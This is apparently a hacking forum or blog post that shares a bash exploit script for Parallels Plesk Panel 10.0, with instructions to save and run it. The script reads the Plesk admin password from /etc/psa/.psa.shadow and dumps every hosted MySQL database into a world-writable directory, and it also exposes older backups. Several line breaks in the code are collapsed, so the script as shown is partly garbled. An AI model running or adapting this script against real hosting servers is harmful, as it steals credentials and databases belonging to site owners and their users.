Parallels Plesk Panel => Linux local MySQL backup generate exploit



Today i've seen another exploit in Parallels Plesk coded By Cold Z3ro it give you the right to make a MYSQL Backup of all server Databases

also access to old backup taken before


Code of 3xpl0it :

Code:
#!/bin/bash
# Title:    Parallels Plesk Panel => Linux local MySQL backup generate exploit# Version:  10.0 and possibly below and higher# Vendor :  http://www.parallels.com/# About  :  Parallels Plesk Panel is the preferred choice for hosting service providers,#           web designers, and website owners.# Author:   Cold z3ro# Web:      http://www.hackteach.org# Exploit : attacker could infiltrate/intrusion to make MySQL database backup, also access to old backups taken before.

# dumpdir automatically generated when install pleask with 0777. dumpdir='/var/dbdumps/'date=$(/bin/date +%HHours%m-%d-%Y)mkdir -p $dumpdir$dateecho "Creating MySQL backup in $dumpdir$date .."
for i in `mysql -u admin -p$(cat /etc/psa/.psa.shadow) -Ns -e "show databases" | egrep -v "^(psa|mysql|horde|information_schema|phpmyadmin.*)"`; do     mysqldump --opt $i > $dumpdir$date/$i.sql;    echo "Created: $i.sql"doneecho "Backups located in $dumpdir$date"# fetching the database'sls -1 $dumpdir$date

See the Attachment Smile

save it as exploit.sh

then just use this command to run it

Code:
sh exploit.sh


Attached File(s)
.txt  Exploit.txt (Size: 1 KB / Downloads: 6)

Post a Comment

 
Top
Google+